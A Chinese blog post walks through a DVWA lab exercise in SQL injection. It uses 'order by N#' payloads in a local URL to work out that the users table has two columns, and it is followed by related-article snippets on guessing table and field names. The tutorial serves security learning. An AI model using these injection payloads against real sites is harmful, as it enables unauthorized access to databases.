SQL注入--猜解数据表列数

已于 2024-04-28 23:11:39 修改
阅读量150 收藏 1
点赞数 6
分类专栏: SQL注入 文章标签: 数据库 web安全 mysql
于 2024-04-28 23:08:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YYYYU_ZHIZZZ/article/details/138294447
版权
文章详细描述了在DVWA环境中利用GET方法进行字符型SQL注入攻击的过程,通过观察不同orderby参数变化,推测用户表结构。攻击者利用`orderby`变量构造恶意SQL查询,获取users表的敏感信息。
摘要由CSDN通过智能技术生成

DVWA源码

由源码可知是字符型注入

此题使用GET方法传参,可直接在url编辑参数

127.0.0.1:82/vulnerabilities/sqli/?id=1' order by 1#&Submit=Submit#

php执行

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#;";

后端数据库执行

127.0.0.1:82/vulnerabilities/sqli/?id=1' order by 2#&Submit=Submit#

php执行

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' order by 2#;";

后端数据库执行

127.0.0.1:82/vulnerabilities/sqli/?id=1' order by 3#&Submit=Submit#

php执行

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' order by 3#;";

后端数据库执行

由以上猜解知,数据表只有2列。

YYYYU_ZHIZZZ
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
sql注入之order by数问题
weixin_33857679的博客
04-07 3510
环境: xampp-win32-5.6.3-0-VC11 dvwa-1.0.8 前言 有幸在网上搜到一款非常不错的渗透测试演练系统 — dvwa ,作为学习,演练真的非常强大啊! 在学习的过程中也遇到一些问题,所以这里做学习分享记录。 问题简述 在用dvwa做sql 注入检测时,遇到一个小小的问题 — order by 出来...
SQl注入学习
weixin_42451330的博客
06-08 944
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节,像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节。
sql注入测字段数的基本方法
bcbobo21cn的专栏
02-16 523
sql order by 可以根据名,或数字指定第几个字段排序;
SQL注入--表的
写下些记录
02-08 5096
步骤 表名—>名—>长度—>具体值 例如:注入点 http://www.XX.com/index.asp?id=1 表名:http://www.XX.com/index.asp?id=1 and exists select * from 测的表名 名:http://www.XX.com/index.asp?id=1 and exists selec...
简单SQL注入
qq_38680693的博客
07-20 1225
本文主要介绍两种SQL注入漏洞: 一、ASP+ACCESS注入 二、PHP+MYSQL 一、ASP+ACCESS注入 SQL注入思路:找注入点  ->  判断是否为注入点  ->  表名  ->  字段名  ->  爆出字段内容 1、找注入点 那么何为注入点?有参数进行数据库传递的都可判为注入点。以此URL为例: xxx.xxx.xx.xx/show.a...
go-sql-driver.zip
11-26
4. **预编译语句**:使用`Prepare()`预编译SQL语句,提高执行效率并防止SQL注入。 5. **日志记录**:在生产环境中,启用日志记录可以帮助追踪和调试数据库操作。 ### 总结 `go-sql-driver`是Go语言与MySQL数据库...
mysql注入-sqlilabs靶场注入
10-15
例如,使用UNION查询在已知数的场景下合并结果,使用注释符号来隐藏部分SQL代码,或者利用ORDER BY和LIMIT来枚举数和行数。此外,还有二进制注入,通过ASCII值转换来插入特殊字符,以及使用存储过程和函数来执行...
sql注入ppt.pptx
08-10
SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库...
易语言SQL注入源码-易语言
06-13
在给定的“易语言SQL注入源码”中,我们可以深入探讨关于SQL注入和易语言编程的相关知识点。 1. SQL注入攻击: SQL注入是一种常见的网络安全漏洞,它发生在应用程序没有充分验证用户输入的情况下。攻击者可以通过...
SQL注入攻击-高级方法,手动注入 自动化注入
11-17
3. **基于UNION联合查询**:在两个查询之间使用UNION操作符,当查询数和数据类型匹配时,可以合并结果,高效地获取大量数据。例如,通过ORDER BY和数据类型的测试来确定数和类型。 **自动化检测与利用**: 工具...
SQL注入——测字段名称
weixin_30337251的博客
07-13 358
之前两篇文章所说的SQL注入手段均是在服务器层面是root权限,而现实的渗透测试过程中,很多都是无权读取information_schema库,并且很多拒绝联合访问Union和order by语句。遇到这些问题时候,就需要我们去爆破测一些数据库字开发逻辑,对一些,表,内容进行测某个 测abc这个是否存在,网页提示: 说明我们所...
sql注入,手动表名字段名
pigHead_chen的专栏
11-14 1万+
方法从网上看来的,记下来以后看。 1,表名: abc.asp?id=12 and 0 错误结果显示米有User表。   abc.asp?id=12 and 0 加载。。。,说明存在表Admin。   2,字段名: abc.asp?id=12 and 0 加载。。。,说明表Admin有字段id。 abc.asp?id=12 and 0 abc.asp?id
SQL注入试验一(获取数据库内容)
热门推荐
Toby的博客
10-10 1万+
这篇博客是讲述SQL注入的实例操作,废话不多说,下面开始:      第一步我们要先判断是否存在注入点      进入实验的网站,如下:       然后在网址后面输入单引号'   回车(如下图,出现错误)       接下里在网址后面输入 and 1='1(此处需要注意闭合单引号,网页恢复正常)       然后将 and 1=‘1 改成 and 1=‘
sql注入获取mysql信息_Burpsuite练兵场-利用SQL注入获取数据库内容数据(二)
weixin_32028323的博客
02-11 478
实验一:Oracle数据库版本查询实验要求:通过SQL注入显示后台数据库Oracle版本信息探查查询数量探查查询类型(注意Oracle数据库执行查询时必须附加表名,因此from dual不可遗漏,Oracle保证数据库中存在dual表以便于构成查询语句)注入显示版本号,完成实验实验二:MySQL和Microsoft数据库版本查询实验要求:通过SQL注入显示后台数据库版本信息探查查询数量(后面...
DVWA1.9 SQL注入全等级手工注入流程
Wh0ami
12-21 2447
最近想复习一下手工sql注入,下面我将通过DVWA1.9进行一遍手工注入过程。 low 自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面简要介绍手工注入(非盲注)的步骤。 1.判断是否存在注入注入是字符型还是数字型 2.SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取...
sql 注入及爆表与字段
Vi的专栏
05-22 8254
http://www.cchacker.com/main 转载请保留来源与版权信息,尊重作者劳动。 一、SQL 脚本注入攻击前奏 注入点的寻找、区分、与判断 手工寻找检测注入点 http://www.target.com/article.asp?id=1ASP 注入 http://www.target.com/article.php?id=1 PHP 注入
MySQL(事务、索引)&&MyBatis
最新发布
hycccccch的博客
07-19 451
事务指的是一组操作的集合,是一个不可分割的工作单位。事务会将所有的操作作为一个整体一起向系统提交或撤销操作请求,即这些操作要么同时成功,要么同时失败默认MySQL的事务是自动提交,即当执行一条DML语句时,MySQL会立即隐式的提交事务开启事务后运行事务不会对数据改变,commit后才会改变数据如果有命令发生错误,需要进行rollback进行回滚、
【星海随笔】vCenter Server 和主机管理。
weixin_41997073的博客
07-16 199
1.方法:删除页面信息,然后断连这个受管主机,断开受管主机的连接不会将其从 vCenter Server 中移除,而只是临时挂起 vCenter Server 执行的所有监控活动。2.方法:在分布式存储中找到该虚拟设备的存储盘,文件里找到相关的vmdk磁盘文件,点击注册虚拟机。当资料不匹配时候,可以删除展示页面,孤立的设备的 匹配位置的信息。断开后,然后重新连接,既可以重新识别受监管的主机。数据库在Vserver中展示的是一个数据库的资料,应该是client的资料。1.确定为资料不匹配导致的展示问题。
Spring框架之DI依赖注入
G81948577的博客
07-18 572
我们在下面构建spring的过程中体会依赖注入;从上面的图中我们知道,在ssm框架中服务层(server)无法直接操作数据库,持久层(dao)是直接操作数据库进行数据处理的,但是我们如果在服务层有一个持久层的对象,然后我们在服务层通过对象去调用持久层的方法就可以操作数据库了。@OverrideSystem.out.println("持久层,你好");UserServiceImpl类中的代码如下@Override。
SQL注入实战:sqli-labs实验详
这个实验过程详细展示了SQL注入的基本步骤,包括识别注入点、闭合字符判断、数检测、数据定位、数据库信息获取、表名与名的暴露,以及实际数据的提取。通过sqli-labs的实践,学习者能够深入理SQL注入的原理,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值